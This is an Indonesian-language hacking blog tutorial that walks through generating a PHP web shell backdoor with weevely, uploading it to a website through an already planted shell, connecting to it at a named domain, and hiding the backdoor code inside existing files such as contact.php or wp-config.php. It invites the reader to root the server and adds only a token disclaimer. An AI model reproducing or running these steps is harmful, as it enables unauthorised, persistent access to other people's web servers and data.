Kali ini kita akan mencba membuat back conect/bindshell dengan menggunakan weevely. Seperti gambar diatas, itu adalah tampilan yang saya ambil dari desktop saya saat membuka weevely dengan command:
weevely
Selanjutnya kita akan meihat beberapa fitur deeri weevely yang tersedia. Dan distiu anda akan melihat fitur weevely backdoors yang akan kita gunakan. Maka anda ketikkan perintahcommand seperti ini:weevely generate phobos549 /home/m0nster.php
Disitu (gambar diatas) terlihat sekali bahwa m0nster.php sudah berhasil kita buat dan kini saya membuka shell yang sudah saya tanamkan kedalam website, dan mengupload m0nster.php seperti gambar dibawah ini:
Nahhh... Terlihat jelas bahwa m0nster.php sudah terupload kedalam server. Saatnya kita mengaksesnya melalui weevely! ketikkan
weevely http://shop.suserc0de.tk/m0nster.php phobos549
Setelah itu, kita enter, dan menunggu hingga ada hasil seperti milik saya dibawah ini:
Selamaat! Saya berhasil terhubung dengan server website tersebut. Dan semua terserah anda, apakah anda mau root server tersebut, atau apapun itu. Yang jelas, blog ini hanya untuk tujuan pembelajaran semata. Segala resiko, ditanggung oleh orang yang mengimplementasikan dijalan yang negatif.
NP: Script yang ada didalam file m0nster.php sebenarnya bisa dicopy-paste kedalam file yang ada didalam website tersebut. seperti di contact.php ataupun juga wp-config.php atau apapun. Dan perintahnya menjadi beda lagi pada saat kita melakukan panggilan terhadap file yang telah kita tanami backdoor lewat terminal kita. contoh : weevely http://shop.suserc0de.tk/config.php phobos549
Sekian untuk tutorial ini. =))
./Pendiam
0 comments:
Post a Comment